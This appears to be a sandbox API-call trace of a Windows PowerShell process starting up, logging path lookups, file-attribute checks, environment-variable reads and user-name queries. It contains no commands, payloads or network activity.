	[0390.244] CoTaskMemFree (pv=0x1b770f20) 
	[0390.245] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0390.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.245] CoTaskMemFree (pv=0x1b770f20) 
	[0390.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.245] SetErrorMode (uMode=0x1) returned 0x1
	[0390.245] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24cef0 | out: lpFileInformation=0x24cef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0390.245] SetErrorMode (uMode=0x1) returned 0x1
	[0390.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.246] SetErrorMode (uMode=0x1) returned 0x1
	[0390.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24cef0 | out: lpFileInformation=0x24cef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0390.246] SetErrorMode (uMode=0x1) returned 0x1
	[0390.246] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0390.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.246] CoTaskMemFree (pv=0x1b770f20) 
	[0390.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.251] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0390.251] SetErrorMode (uMode=0x1) returned 0x1
	[0390.252] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24ceb0 | out: lpFileInformation=0x24ceb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0390.252] SetErrorMode (uMode=0x1) returned 0x1
	[0390.252] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0390.252] SetErrorMode (uMode=0x1) returned 0x1
	[0390.252] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24ceb0 | out: lpFileInformation=0x24ceb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0390.252] SetErrorMode (uMode=0x1) returned 0x1
	[0390.252] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0390.252] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0390.252] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.817] SetErrorMode (uMode=0x1) returned 0x1
	[0390.817] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24ceb0 | out: lpFileInformation=0x24ceb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0390.817] SetErrorMode (uMode=0x1) returned 0x1
	[0390.817] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.817] SetErrorMode (uMode=0x1) returned 0x1
	[0390.817] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24ceb0 | out: lpFileInformation=0x24ceb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0390.817] SetErrorMode (uMode=0x1) returned 0x1
	[0390.818] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.818] SetErrorMode (uMode=0x1) returned 0x1
	[0390.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24ceb0 | out: lpFileInformation=0x24ceb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0390.818] SetErrorMode (uMode=0x1) returned 0x1
	[0390.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.818] SetErrorMode (uMode=0x1) returned 0x1
	[0390.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24ceb0 | out: lpFileInformation=0x24ceb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0390.818] SetErrorMode (uMode=0x1) returned 0x1
	[0390.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.819] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.819] SetErrorMode (uMode=0x1) returned 0x1
	[0390.819] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24cef0 | out: lpFileInformation=0x24cef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0390.819] SetErrorMode (uMode=0x1) returned 0x1
	[0390.819] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.819] SetErrorMode (uMode=0x1) returned 0x1
	[0390.819] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24cef0 | out: lpFileInformation=0x24cef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0390.819] SetErrorMode (uMode=0x1) returned 0x1
	[0390.819] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0390.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.820] SetErrorMode (uMode=0x1) returned 0x1
	[0390.820] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24cef0 | out: lpFileInformation=0x24cef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0390.820] SetErrorMode (uMode=0x1) returned 0x1
	[0390.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.820] SetErrorMode (uMode=0x1) returned 0x1
	[0390.820] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24cef0 | out: lpFileInformation=0x24cef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0390.820] SetErrorMode (uMode=0x1) returned 0x1
	[0390.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0390.822] SetErrorMode (uMode=0x1) returned 0x1
	[0390.822] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d1b0 | out: lpFileInformation=0x24d1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0390.822] SetErrorMode (uMode=0x1) returned 0x1
	[0390.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0390.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0390.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0390.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.371] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0391.371] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d518 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d518) returned 0x1
	[0391.371] CoTaskMemFree (pv=0x1b793160) 
	[0391.371] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0391.371] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d558 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d558) returned 1
	[0391.372] CoTaskMemFree (pv=0x1027c0) 
	[0391.374] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e410a8*="Available", lpRawData=0x2e40e38) returned 1
	[0391.876] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0391.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.876] CoTaskMemFree (pv=0x1b770f20) 
	[0391.878] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0391.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.878] CoTaskMemFree (pv=0x1b770f20) 
	[0391.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.884] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0391.884] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0391.884] CoTaskMemFree (pv=0x1b770f20) 
	[0391.884] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0391.884] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0391.884] CoTaskMemFree (pv=0x1b770f20) 
	[0391.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.887] GetCurrentProcessId () returned 0xb00
	[0391.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
